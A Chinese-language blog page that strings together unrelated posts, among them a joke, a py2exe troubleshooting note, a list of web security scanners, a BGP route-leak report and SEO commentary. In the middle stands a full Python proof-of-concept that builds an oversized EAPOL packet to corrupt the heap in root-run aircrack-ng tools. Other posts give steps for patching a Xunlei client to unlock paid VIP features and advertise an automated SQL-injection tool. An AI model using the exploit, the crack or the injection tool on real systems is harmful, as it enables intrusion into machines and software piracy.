Chinadu's Blog

使用说明:先安装原版迅雷5 v5.9.18.1364文件(下载地址:http://down.sandai.net/Thunder5.9.18.1364.exe),安装完将补丁放入安装好的目录下(默认应该是:C:Program FilesThunder NetworkThunderProgram),然后退出迅雷打开补丁(win7下请用管理员权限打开)点Patch即可完成破解,破解完即可享受离线下载和VIP去广告等功能.

下载地址：

点我下载

PS:很犀利，有些银行的工作人员态度确实差到了极点。顶一下这哥们！

某名牌大学校长针对学生恋爱成风现象，

召开全校男生大会训话：“我们这里是培养成功人士和社会精英的地方，

据统计，成功人士平均比配偶大十二岁，精英比配偶大十七岁，

你们未来的老婆现在还在小学和幼儿园呢，

你们现在花费时间和金钱养的是别人的老婆！”

#!/usr/bin/env python

# -*- coding: UTF-8 -*-

''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675.

The tools' code responsible for parsing IEEE802.11-packets assumes the

self-proclaimed length of a EAPOL-packet to be correct and never to exceed

a (arbitrary) maximum size of 256 bytes for packets that are part of the

EAPOL-authentication. We can exploit this by letting the code parse packets

which:

a) proclaim to be larger than they really are, possibly causing the code

to read from invalid memory locations while copying the packet;

b) really do exceed the maximum size allowed and overflow data structures

allocated on the heap, overwriting libc's allocation-related

structures. This causes heap-corruption.

Both problems lead either to a SIGSEGV or a SIGABRT, depending on the code-

path. Careful layout of the packet's content can even possibly alter the

instruction-flow through the already well known heap-corruption paths

in libc. Playing with the proclaimed length of the EAPOL-packet and the

size and content of the packet's padding immediately end up in various

assertion errors during calls to free(). This reveals the possibility to

gain control over $EIP.

Given that we have plenty of room for payload and that the tools are

usually executed with root-privileges, we should be able to have a

single-packet-own-everything exploit at our hands. As the attacker can

cause the various tools to do memory-allocations at his will (through

faking the appearance of previously unknown clients), the resulting

exploit-code should have a high probability of success.

The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev

r238 to work. It generates pcap-file with single packet of the following

content:

0801000000DEADC0DE0000DEADC0DE010000000000000000AAAA03000000888E0103FDE8FE0

108000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000043616E20492068617320736F6D65206D6F6172

3F

03/27/2010, Lukas Lueg, lukas.lueg@gmail.com

'''

import cpyrit.pckttools

import scapy.layers

# A IEEE802.11-packet with LLC- and SNAP-header, looking like the second

# phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL-

# packet will cause an overflow of the "eapol"-field in struct WPA_ST_info and

# struct WPA_hdsk.

# We have plenty of room for exploit-payload as most of the fields in the

# EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent

# heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in

# case of airodump-ng...

pckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00', \

addr2='00:de:ad:c0:de:01', \

FCfield='to-DS') \

/ scapy.layers.dot11.LLC() \

/ scapy.layers.dot11.SNAP() \

/ scapy.layers.l2.EAPOL(len=65000) \

/ cpyrit.pckttools.EAPOL_Key() \

/ cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \

/ scapy.packet.Padding(load='Can I has some moar?')

if __name__ == '__main__':

print "Packet's content:"

print ''.join("%02X" % ord(c) for c in str(pckt))

filename = 'aircrackng_exploit.cap'

print "Writing to '%s'" % filename

writer = cpyrit.pckttools.Dot11PacketWriter(filename)

writer.write(pckt)

writer.close()

print 'Done'

前两天我图新鲜，把 Windows 中的 Python 升级到了 2.6，PyGtk 和 Py2exe 也随之升级到了支持 2.6 的版本。然后问题就来了，用 Py2exe for Python 2.6 打包的 PyGtk 程序在打包的机器上运行正常，但拷贝到部分人的 Windows 中后却无法运行，点击就出现：

由于应用程序配置不正确，应用程序未能启动。重新安装应用程序可能会纠正这个问题

刚开始我以为是 Win 下 GTK 库 dll 的问题，反复地验证几次觉得应该问题不在 GTK 上。如果缺少外部库，Python 应该报缺少 dll 问题，而不是应用程序出错。怀疑是缺少微软的库，用 PE Explorer 试用版在出问题的电脑上扫描一下应用程序的依赖关系，发现缺少 msvcr90.dll，将 msvcr90.dll 拷贝到程序包中，再扫描依赖关系，所有的 dll 已经都满足了，仍然报出同样的错误。

后来基本确定是 Python 2.6 的问题。因为 Python 2.6 是使用 Microsoft Visual C++ 2008 编译的，所以要想 py2exe for 2.6 打包的程序运行，目标机器上必须装有 Python 2.6 或者 Microsoft Visual C++ 2008 Redistributable Package。否则系统就无法识别 exe 程序的 CRT， 因而它就成为无法运行的程序。

之所以程序在一部分人的机器上运行正常，是因为这些人 Windows 中安装了 VC2008 开发套件，自然也就包括了 VC2008 运行时库。

因为我们发布程序时无法强制每个人都去安装 Microsoft Visual C++ 2008 Redistributable Package，所以需要发布 exe 程序时，还是使用老版本的 Python 2.5 和 Py2exe for Python 2.5，别使用 Python 2.6 为好。

利用sql server 的for xml 语法可以一次性获取多行结果，加快了注入速度。支持SQL2005/2008的注入。

下载地址：

SFX-SQLi Tool (binaries)A tool which automates the process (requires Microsoft .NET Framework 2.0) - v1.1

SFX-SQLi Tool (source code)Source code of the tool (available in VB.NET for Visual Studio 2008) - v1.1

WebVulnerableSql (ASP.NET)Vulnerable web application sample for testing (includes executable and source code)

unetbootin最新版下载地址：

http://unetbootin.sourceforge.net/

微软推出了AV下载。http://www.microsoft.com/security_essentials/

最新免费AV (AntiVirus): Microsoft Security Essentials

Microsoft Security Essentials 是一款通过正版验证的Windows电脑可以免费使用的微软安全防护软件，帮助您远离病毒和恶意软件的威胁。

官网上没有看到中文版的下载，但是理论上这个beta版会有英文，简体中文，和巴西葡萄牙文。

想下载中文版的，大牛蛙提供了下载，MSE简体中文测试版1.0下载

来源：网路游侠

在国内一些网站上经常看到文章说某某WEB应用安全评估工具排名，但是很可惜，绝大多数都是国外人搞的，界面是英文，操作也不方便，那就在这里综合下，列举下国内WEB安全评估人员常用的一些工具。当然，毫无疑问的，几乎都是商业软件，并且为了描述更准确，尽量摘取其官方网站的说明：
同时说明下：本排序不代表本人眼中的厂商或工具实力排名。

1.IBM Rational AppScan

IBM公司推出的IBM Rational AppScan产品是业界领先的应用安全测试工具，曾以 Watchfire AppScan 的名称享誉业界。Rational AppScan 可自动化 Web 应用的安全漏洞评估工作，能扫描和检测所有常见的 Web 应用安全漏洞，例如 SQL 注入（SQL-injection）、跨站点脚本攻击（cross-site scripting）及缓冲溢出（buffer overflow）等方面安全漏洞的扫描。
游侠标注：AppScan不但可以对WEB进行安全评估，更重要的是导出的报表相当实用，也是国外产品中唯一可以导出中文报告的产品，并且可以生成各种法规遵从报告，如ISO 27001、OWASP 2007等。
阅读全文...

Google对于网络搜索的排名有着极为复杂的算法，今天他们宣布，网站的速度也将成为搜索排名的新因素。
Google认为，网站和网页加载迅速，可以让用户节省下时间并且观感更好，这也符合Google的经营理念，不过需要注意的是，速度并不是最主要的排名因素，“相关性”在排名中的主导作用依然不会改变，速度对搜索结果的影响程度应该不到1%。

本周四早晨，一家叫IDC China Telecommunication的小型ISP的错误路由数据，经过中国电信的二次传播，扩散到了整个互联网，波及到了 AT&T、Level3、Deutsche Telekom、Qwest Communications和Telefonica等多个国家的大型ISP。事故始于美国东部时间上午10点，持续了大约20分钟。在此过程中，有32,000到37,000个网络接收到了错误的数据，包括8,000个美国网络，超过8,500个中国网络，1,100个澳大利亚网络，230个法国网络。

我们很多人做seo是舍本求末的，忽略了网站的最根本问题，片面强调关键字的堆积，怎么去骗搜索引擎，甚至会花一些钱去请所谓的seo高手来提高alexa的排名，但这样做无异于杀鸡取卵。如果你是想通过alexa排名或者某个关键字的排名来达到某些特有目的，比如说公司的融资，比如说说服厂商来你的网站做广告，比如说为了在商业来往上更有底气，这是“可以的”，否则，请三思而后行。我前面之所以要在可以的加上一个引号，是因为我觉得，不管怎么样，以诚为本这是做人做事的基本准则，如果你采取一些非法的手段来获取排名，然后通过这些排名去获得某些利益，我觉得总是不太好的。

在这里，我需要再一次重申seo的目的，seo只不过是为了搜索引擎更好的发现你的网站，因为搜索引擎的蜘蛛本身是一个逻辑程序，所以它有它的特殊点，如果你不符合它的味口，很可能你网站有好的东西搜索不到，也可能你比竞争对手的产品好，但用户却无法在搜索引擎中找到你，甚至于你的产品差点，想通过改善seo来获得较好的排名，这都是可以的。
阅读全文...